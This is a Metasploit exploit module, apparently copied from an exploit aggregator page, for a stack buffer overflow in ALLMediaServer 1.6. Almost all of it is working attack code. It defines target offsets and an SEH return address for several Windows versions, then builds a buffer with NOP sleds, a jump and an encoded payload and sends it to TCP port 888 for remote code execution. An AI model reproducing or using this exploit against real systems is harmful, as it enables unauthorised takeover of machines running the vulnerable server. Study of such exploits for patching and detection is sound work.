Share
## https://sploitus.com/exploit?id=PACKETSTORM:166573
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
# Author: Hejap Zairy  
# Date: 1.08.2022  
# Exploit Prof  
# Proof and Exploit:  
#image:https://i.imgur.com/yLrRR2t.png  
#video:https://streamable.com/x4i50c  
  
  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'ALLMediaServer 1.6 Buffer Overflow',  
'Description' => %q{  
This module exploits a stack buffer overflow in ALLMediaServer 1.6  
The vulnerability is caused due to a boundary error within the  
handling of HTTP request.  
Thank you Saud Alenazi and 0xSaudi   
and Muhammad Al Ahmadi and all the friends in Tuwaiq i Love Tuwaiq  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Hejap Zairy Al-Sharif', # Remote exploit and Metasploit module  
],  
'DefaultOptions' =>  
{  
'ExitFunction' => 'process', #none/process/thread/seh  
},  
'Platform' => 'win',  
'Payload' =>  
{  
'BadChars' => '\x00\x0a\x0d\xff'   
},  
  
'Targets' =>  
[  
[ 'ALLMediaServer 1.6 / Windows 10 - English',  
{  
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET   
'Offset' => 1072  
}  
],  
[ 'ALLMediaServer 1.6 / Windows XP SP3 - English',  
{  
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET   
'Offset' => 1072  
}  
],  
[ 'ALLMediaServer 1.6 / Windows 7 SP1 - English',  
{  
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET   
'Offset' => 1072  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Apr 1 2022',  
'DefaultTarget' => 1))  
  
register_options([Opt::RPORT(888)], self.class)  
  
end  
  
def exploit  
connect  
buffer = ""  
buffer << make_nops(target['Offset'])  
buffer << "\xeb\x06\x90\x90"  
buffer << "\x0B\x59\x40\x00"  
buffer << make_nops(100)  
buffer << payload.encoded  
buffer << make_nops(50)  
print_status("Sending payload ... \n Exploit MediaServer")  
sock.put(buffer)  
handler  
disconnect  
end  
end